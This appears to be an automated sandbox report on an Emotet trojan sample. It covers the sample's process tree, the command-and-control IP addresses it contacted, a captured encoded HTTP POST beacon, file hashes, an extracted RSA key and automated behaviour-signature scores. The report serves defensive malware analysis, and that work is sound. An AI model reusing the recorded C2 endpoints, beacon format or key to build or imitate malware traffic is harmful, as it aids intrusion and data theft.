_pop_pthread_mem
_pthread_tls_init
_push_pthread_mem.part.0
__pthread_once_raw.part.1.constprop.4
___pthread_self_lite
___shmem_winpthreads_grabber__pthread_key_dest_shmem
___shmem_winpthreads_grabber__pthread_cancelling_shmem
___shmem_winpthreads_grabber__pthread_concur_shmem
___shmem_winpthreads_grabber__pthread_tls_once_shmem
___shmem_winpthreads_grabber__pthread_tls_shmem
___shmem_winpthreads_grabber__pthread_key_lock_shmem
___shmem_winpthreads_grabber__pthread_key_max_shmem
___shmem_winpthreads_grabber__pthread_key_sch_shmem
___shmem_winpthreads_grabber_pthr_root_shmem
___shmem_winpthreads_grabber_pthr_last_shmem
___shmem_winpthreads_grabber_mtx_pthr_locked_shmem
___shmem_winpthreads_grabber_idList_shmem
___shmem_winpthreads_grabber_idListCnt_shmem
___shmem_winpthreads_grabber_idListMax_shmem
___shmem_winpthreads_grabber_idListNextId_shmem
___pth_gpointer_locked
__pthread_cleanup_dest.part.2
___dyn_tls_pthread@12
_pthread_create_wrapper
_thread_print_set
_print_state
_thread_print
___shmem_winpthreads_grabber_once_obj_shmem
___shmem_winpthreads_grabber_once_global_shmem
_pthread_timechange_handler_np
_pthread_num_processors_np
_pthread_set_num_processors_np
_pthread_once
_pthread_key_create
_pthread_key_delete
_pthread_getspecific
_pthread_setspecific
_pthread_equal
__pthread_cleanup_dest
_pthread_self
_pthread_getevent
_pthread_gethandle
_pthread_getclean
_pthread_get_concurrency
_pthread_set_concurrency
_pthread_exit
___pthread_shallcancel
__pthread_setnobreak
__pthread_invoke_cancel
_test_cancel_locked
_pthread_testcancel
_pthread_delay_np
_pthread_delay_np_ms
_pthread_cancel
_pthread_kill
__pthread_get_state
__pthread_set_state
_pthread_attr_init
_pthread_attr_destroy
_pthread_attr_setdetachstate
_pthread_attr_getdetachstate
_pthread_attr_setinheritsched
_pthread_attr_getinheritsched
_pthread_attr_setscope
_pthread_attr_getscope
_pthread_attr_getstackaddr
_pthread_attr_setstackaddr
_pthread_attr_getstacksize
_pthread_attr_setstacksize
_pthread_setcancelstate
_pthread_setcanceltype
_pthread_create
_pthread_join
__pthread_tryjoin
_pthread_detach
___shmem_winpthreads_grabber_dummy_concurrency_level_shmem
_pthread_getconcurrency
_pthread_setconcurrency
___shmem_winpthreads_init_mutex_global_shmem
_mutex_global_shmem_init
___shmem_winpthreads_init_mutex_global_static_shmem
_mutex_global_static_shmem_init
___shmem_winpthreads_init_mxattr_recursive_shmem
___shmem_winpthreads_init_mxattr_errorcheck_shmem
_mutex_ref_unlock
_mutex_ref_init
_mutex_ref_destroy
__mutex_trylock.isra.0
_mutex_unref.isra.1
___shmem_winpthreads_grabber_mutex_global_shmem
___shmem_winpthreads_grabber_mutex_global_static_shmem
_mutex_print_set
_mutex_print
___shmem_winpthreads_grabber_mxattr_recursive_shmem
This file is not on VirusTotal.

Process Tree


nonmanual.exe, PID: 1952, Parent PID: 1068
Full Path: C:\Users\user\AppData\Local\Temp\nonmanual.exe
Command Line: "C:\Users\user\AppData\Local\Temp\nonmanual.exe"
nonmanual.exe, PID: 1272, Parent PID: 1952
Full Path: C:\Users\user\AppData\Local\Temp\nonmanual.exe
Command Line: --f4134209
explorer.exe, PID: 1676, Parent PID: 1632
Full Path: C:\Windows\explorer.exe
Command Line: C:\Windows\Explorer.EXE
services.exe, PID: 464, Parent PID: 376
Full Path: C:\Windows\sysnative\services.exe
Command Line: C:\Windows\system32\services.exe
compontitle.exe, PID: 112, Parent PID: 464
Full Path: C:\Windows\SysWOW64\compontitle.exe
Command Line: "C:\Windows\SysWOW64\compontitle.exe"
compontitle.exe, PID: 912, Parent PID: 112
Full Path: C:\Windows\SysWOW64\compontitle.exe
Command Line: --ce2bae20

Hosts

Direct IP Country Name
Y 78.47.106.72 [VT] Germany
Y 165.227.156.155 [VT] Germany
Y 144.76.56.36 [VT] Germany

TCP

Source Source Port Destination Destination Port
192.168.35.23 49175 144.76.56.36 8080
192.168.35.23 49177 165.227.156.155 443
192.168.35.23 49176 78.47.106.72 8080

UDP

No UDP connections recorded.

DNS

No domains contacted.

HTTP Requests

URI Data
http://165.227.156.155:443/window/cookies/tpt/
POST /window/cookies/tpt/ HTTP/1.1
Referer: http://165.227.156.155/window/cookies/tpt/
Content-Type: application/x-www-form-urlencoded
DNT: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 165.227.156.155:443
Content-Length: 421
Connection: Keep-Alive
Cache-Control: no-cache

zlY5Slpf6S=a01FhjVPmvaNnto3nfdishVuuOwcXygQbscV7hAx9geeimCjOHkdRzLJsinNH2LxMt7LOSNIWKocoODiB8LTEI1mGnUGtqqgMMamEKqU0LyM8BjkfOvCcRdYmYrU7oyFbPpnjjv3o3RxgAJJShkAATv8LOvaI6GMDiuJ8n77ZfeDupKADvRHuCHZBalqvJWXsw%2BaQ22Xn0MP4ImrXApky%2Bcr4svXfkyvSMh1v%2FNIV8PikBRlbN2QA5qc5Ks8PHrOyklAeHdpuFm4MulYL7%2FIbTSE%2B4NHxdpQvGTUoHqr0a1Phd2NdXoq%2B8E7aRdTQQwJjDHdjbsWkyT%2BJt2TwRNTUaQCfgTwzPEjDwvSs9MebqHGjsW4rYhLck8ki9Ky0PPpqL26wg%3D%3D

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

No JA3 hashes found.

File name compontitle.exe
Associated Filenames
C:\Windows\SysWOW64\compontitle.exe
File Size 371397 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 4a19c0efa79d514e9003f0fb5abfa93d
SHA1 87c3ebe34ff049e02b24305cf7b6df0dda502a3b
SHA256 d3717429ba31832577c8a24fe89a4be77aa9198f351fa5a2911c95b20c4e9e39
CRC32 42BA7649
Ssdeep 6144:uyojDQSFZbS+pzaSKSa0/fUnt0vJgk2TBsGhw2/K6786TEnCAIpi9MxipEl7BuHh:MDQSzDq0mTMbGW
ClamAV None
Yara None matched
CAPE Yara None matched
Type Emotet Config
RSA public key
-----BEGIN PUBLIC KEY----- MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAKl4M80uy0jcxUiFIaJJyxgHVVnFtCq6 bi6f2xXPh/XUZNyN8UXDe5HzhTc4kwon9MBZffNwFOIc61QfV3K3YzEI/ktcyNqK LS67ONxsVep769QdiVQJXrIaFjMXKz6viwIDAQAB -----END PUBLIC KEY-----
address
Type Emotet Payload
Size 65536 bytes
Process nonmanual.exe
PID 1952
Path C:\Users\user\AppData\Local\Temp\nonmanual.exe
MD5 c40cdb635ad21a43ee6a292a243ae04f
SHA1 29970c19d0759c9a116c6e74f8751a75d2ac3836
SHA256 2012de6e914d2fc253cbb96dfb06d081c25b2e9ce0bd3dd59c3918a6169667cc
CRC32 17673F3A
Ssdeep 1536:P2JC6yyC5sySGPukvCh1kscmssU359NstQRk13z5Pn2ESeXv:OJk5ssPuk6km9K5D3g3z5P
Yara None matched
CAPE Yara
  • Emotet
  • Emotet Payload
Type Emotet Payload
Size 72192 bytes
Process nonmanual.exe
PID 1272
Path C:\Users\user\AppData\Local\Temp\nonmanual.exe
MD5 496a700da24d99a88a18e1af20c98a9a
SHA1 237ca6e132d90c9cfe02f65cfd8230b174f5dbb5
SHA256 d11c6216147cd7f871bcc23dad2ec11a6c219c0cba7fe573216c71c5726be123
CRC32 2B08F656
Ssdeep 1536:22JC6yyC5sySGPukvCh1kscmssU359NstQRk13z5Pn2ESeXq:fJk5ssPuk6km9K5D3g3z5P
Yara None matched
CAPE Yara
  • Emotet
  • Emotet Payload
Process Name nonmanual.exe
PID 1952
Dump Size 289280 bytes
Module Path C:\Users\user\AppData\Local\Temp\nonmanual.exe
Type PE image: 32-bit executable
MD5 9a36056acd3e9dbc8e6a512403532355
SHA1 68f056a7bf8b63345542ea651b215d10071b2e46
SHA256 5a30e6abe152f8da87f0fc5b6310e6e14dffc4e06206b82b375fdcd5f72499ac
CRC32 6046627B
Ssdeep 6144:6yojDQSFZAS+pzaSKSa0jfUnv0vJgk2T:QDQSz0M0m
ClamAV None
Yara None matched
CAPE Yara None matched
Dump Filename 5a30e6abe152f8da87f0fc5b6310e6e14dffc4e06206b82b375fdcd5f72499ac
Process Name compontitle.exe
PID 112
Dump Size 289280 bytes
Module Path C:\Windows\SysWOW64\compontitle.exe
Type PE image: 32-bit executable
MD5 4b2925bf010d513f2673c8bf04e2b654
SHA1 88e4d025b4d5b236f2d27079aee3f1928ce38709
SHA256 7d59fe1ed2ba585e4dad308544a981cf69099ebd5932e8c32ea310e9c915f6f1
CRC32 EACE992C
Ssdeep 6144:6yojDQSFZbS+pzaSKSa0XfUnm0vJgk2T:QDQSzD90m
ClamAV None
Yara None matched
CAPE Yara None matched
Dump Filename 7d59fe1ed2ba585e4dad308544a981cf69099ebd5932e8c32ea310e9c915f6f1
Process Name nonmanual.exe
PID 1272
Dump Size 289280 bytes
Module Path C:\Users\user\AppData\Local\Temp\nonmanual.exe
Type PE image: 32-bit executable
MD5 73dc4c2e4f998d2caf439fcf730445a7
SHA1 bb580e73f10de98dd0abc4f50268a3a00402e2be
SHA256 6dea593e7f9bc61c241d3e9c01db0181923dcb6063189159a59411a6d0db9910
CRC32 FDCF5A4D
Ssdeep 6144:6yojDQSFZbS+pzaSKSa0bfUnm0vJgk2T:QDQSzDJ0m
ClamAV None
Yara None matched
CAPE Yara None matched
Dump Filename 6dea593e7f9bc61c241d3e9c01db0181923dcb6063189159a59411a6d0db9910
Process Name explorer.exe
PID 1676
Dump Size 2861568 bytes
Module Path C:\Windows\explorer.exe
Type PE image: 64-bit executable
MD5 2c7acd0d30696ad195ae6784726eeb2b
SHA1 362ec1b6833c91c178b2bd04911a331aed1134f5
SHA256 27689d8eb1257ca5a884941dbc3f59ab0b9831bc68b7bd9df33057a62a614af7
CRC32 7134BC56
Ssdeep 49152:9xrceI/lIRYraisQhFCUF9vYYYYYYYYYYYRYYYYYYYYYYE3iA7/eFUJN9ojoso2W:PrcPlIWxvYYYYYYYYYYYRYYYYYYYYYY4
ClamAV None
Yara None matched
CAPE Yara None matched
Dump Filename 27689d8eb1257ca5a884941dbc3f59ab0b9831bc68b7bd9df33057a62a614af7
Process Name compontitle.exe
PID 912
Dump Size 289280 bytes
Module Path C:\Windows\SysWOW64\compontitle.exe
Type PE image: 32-bit executable
MD5 2a3496f9e19b7b56c11e91705558815e
SHA1 39c84e576586a586a58fb7a84e5e793ef22cd862
SHA256 61887b003770338b05e4986a8615543994f825d1203a96d79a0c8de5461c74bf
CRC32 9430148C
Ssdeep 6144:6yojDQSFZbS+pzaSKSa0jfUnZ0vJgk2T:QDQSzD+0m
ClamAV None
Yara None matched
CAPE Yara None matched
Dump Filename 61887b003770338b05e4986a8615543994f825d1203a96d79a0c8de5461c74bf

Processing ( 8.167 seconds )

  • 3.447 CAPE
  • 2.696 ProcDump
  • 0.739 BehaviorAnalysis
  • 0.295 Static
  • 0.281 Dropped
  • 0.242 NetworkAnalysis
  • 0.242 TargetInfo
  • 0.102 TrID
  • 0.094 Deduplicate
  • 0.022 Strings
  • 0.006 AnalysisInfo
  • 0.001 Debug

Signatures ( 0.938 seconds )

  • 0.553 antidbg_windows
  • 0.039 antiav_detectreg
  • 0.031 NewtWire Behavior
  • 0.031 decoy_document
  • 0.03 antivm_vbox_window
  • 0.029 api_spamming
  • 0.023 antisandbox_script_timer
  • 0.011 ransomware_files
  • 0.009 infostealer_ftp
  • 0.008 Doppelganging
  • 0.008 injection_createremotethread
  • 0.008 InjectionCreateRemoteThread
  • 0.008 antianalysis_detectreg
  • 0.008 antiav_detectfile
  • 0.007 injection_runpe
  • 0.007 ransomware_extensions
  • 0.006 InjectionProcessHollowing
  • 0.006 antivm_generic_disk
  • 0.006 persistence_autorun
  • 0.005 InjectionInterProcess
  • 0.005 antidebug_guardpages
  • 0.005 exploit_heapspray
  • 0.005 infostealer_im
  • 0.005 infostealer_mail
  • 0.004 stealth_file
  • 0.004 mimics_filetime
  • 0.004 virus
  • 0.004 antivm_vbox_keys
  • 0.003 tinba_behavior
  • 0.003 bootkit
  • 0.003 rat_nanocore
  • 0.003 stack_pivot
  • 0.003 antivm_generic_scsi
  • 0.003 reads_self
  • 0.003 antianalysis_detectfile
  • 0.003 antivm_vbox_files
  • 0.002 betabot_behavior
  • 0.002 kibex_behavior
  • 0.002 vawtrak_behavior
  • 0.002 cerber_behavior
  • 0.002 hancitor_behavior
  • 0.002 antivm_parallels_keys
  • 0.002 antivm_vmware_keys
  • 0.002 browser_security
  • 0.002 infostealer_bitcoin
  • 0.002 masquerade_process_name
  • 0.002 recon_fingerprint
  • 0.001 malicious_dynamic_function_loading
  • 0.001 hawkeye_behavior
  • 0.001 network_tor
  • 0.001 antivm_vbox_libs
  • 0.001 exploit_getbasekerneladdress
  • 0.001 recon_programs
  • 0.001 antivm_generic_services
  • 0.001 antiemu_wine_func
  • 0.001 shifu_behavior
  • 0.001 infostealer_browser_password
  • 0.001 ursnif_behavior
  • 0.001 dynamic_function_loading
  • 0.001 kovter_behavior
  • 0.001 stealth_timeout
  • 0.001 antidbg_devices
  • 0.001 antivm_generic_diskreg
  • 0.001 antivm_vmware_files
  • 0.001 antivm_xen_keys
  • 0.001 ketrican_regkeys
  • 0.001 geodo_banking_trojan
  • 0.001 darkcomet_regkeys
  • 0.001 disables_browser_warn
  • 0.001 modify_uac_prompt

Reporting ( 0.048 seconds )

  • 0.045 SubmitCAPE
  • 0.003 CompressResults
Task ID 115348
Mongo ID 5de5f8cda04cefe70a3b0996
Cuckoo release 1.3-CAPE